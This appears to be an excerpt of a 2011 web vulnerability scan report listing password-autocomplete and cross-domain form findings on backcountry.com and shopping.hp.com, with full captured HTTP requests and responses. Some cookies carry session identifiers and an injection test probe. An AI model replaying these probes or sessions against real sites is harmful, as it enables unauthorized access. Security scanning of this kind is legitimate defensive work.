Severity:   Low
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
</div>


<form id="new_account" action="https://www.backcountry.com/store/user/create_new_account.html" method="POST">
<input type="hidden" name="mv_form_profile" value="create_new_account_profile" />
...[SNIP]...
<td><input type="password" name="mv_password" id="mv_password" class="entry" value="" /></td>
...[SNIP]...
<td><input type="password" name="mv_verify" id="mv_verify" class="entry" value="" /></td>
...[SNIP]...

5.2. http://www.backcountry.com/store/user.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<div id="returning_and_forgotten">
<form id="returning_customer" action="https://www.backcountry.com/store/user/do_login.html" method="POST">
<input type="hidden" name="prev_vars" value="" />
...[SNIP]...
<td><input type="password" name="mv_password" id="mv_password" class="entry" value="" /></td>
...[SNIP]...

6. Cross-domain POST  previous  next
There are 11 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


6.1. http://www.shopping.hp.com/design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Personal%20Shopper" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.2. http://www.shopping.hp.com/desktops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Computer%20Landing" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.3. http://www.shopping.hp.com/esp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgt2U3wN6NSvrvlHYdgad0ic%3D; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 167900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Printer%20Landing" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.4. http://www.shopping.hp.com/printer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:50 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjiNGW3A97NCDouVXddgea0ic%3D; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Printer%20Landing" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.5. http://www.shopping.hp.com/supplies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkij96W2w9%2FOi%2Frv1TZdg3Tng%3D%3D; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Accessories%20Store%20Printer%20Supplies" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

6.6. http://www.shopping.hp.com/webapp/shopping/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/home.do

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/country/us/en/cs/media/swf/homepage_carousel.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; EMID=; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; s_depth=1; lang=en-us; cc=us; s_cc=true; s_sq=%5B%5BB%5D%5D; h_cm2=cs%3Aus_en_home_message_l1_hho_fixed_shopnow_flashlink

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrit2T3wh5OijqulLZdgKXmiaumQ%3D%3D; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 148762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_head
...[SNIP]...
<div style="margin-bottom:-10px;margin-top:3px;margin-left:0px">
               <form name="SALES_CALLBACK" id="SALES_CALLBACK" action="https://suth.ehosts.net/NetAgent/HPCallBackLogin.aspx?ROUTEIDENT=C2C%20Personal%20Shopper" method="post">
<input type="hidden" name="Prod_List" value=""/>
...[SNIP]...

